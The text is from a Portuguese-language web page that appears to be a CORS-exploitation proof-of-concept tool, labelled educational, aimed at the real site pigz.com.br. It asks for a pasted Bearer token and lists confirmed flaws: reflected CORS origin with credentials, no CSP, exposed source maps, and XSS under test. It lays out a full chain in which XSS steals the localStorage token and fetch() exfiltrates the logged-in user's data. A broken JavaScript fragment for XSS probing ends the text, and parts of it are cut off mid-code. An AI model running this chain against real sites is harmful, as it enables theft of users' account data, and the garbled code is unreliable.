Token de Acesso

Cole seu token Bearer para extrair dados via CORS

Dados Extraídos
Teste CORS
API Scanner
Exploit Chain
Clique em "Extrair Dados" ou "Extrair TUDO" para começar.

Teste de Vulnerabilidade CORS

Origin atual: carregando...

Clique em "Testar CORS" para verificar.

Cadeia de Exploração

1. CORS (CRÍTICO)

ACAO reflete origem + ACAC:true

✓ Confirmado

2. CSP Ausente

Sem Content-Security-Policy

✓ Confirmado

3. Source Maps Expostos

.js.map acessível em produção

✓ Confirmado

4. XSS (EM TESTE)

Busca e slugs refletem input

? Em análise

Cadeia completa: XSS em pigz.com.br → rouba token do localStorage → fetch() via CORS para partner-api → exfiltra dados do usuário logado 


  






  Shannon Security Team - PoC Educacional



')) {
          el.innerHTML += '  ⚠ XSS EXECUTAVEL!\n';
        }
      } else {
        el.innerHTML += '❌ NAO REFLETIDO: ' + url.substring(0, 80) + '...\n';
      }
    } catch(e) {
      el.innerHTML += '❌ ERRO: ' + url.substring(0, 60) + ' - ' + e.message + '\n';
    }
  }
}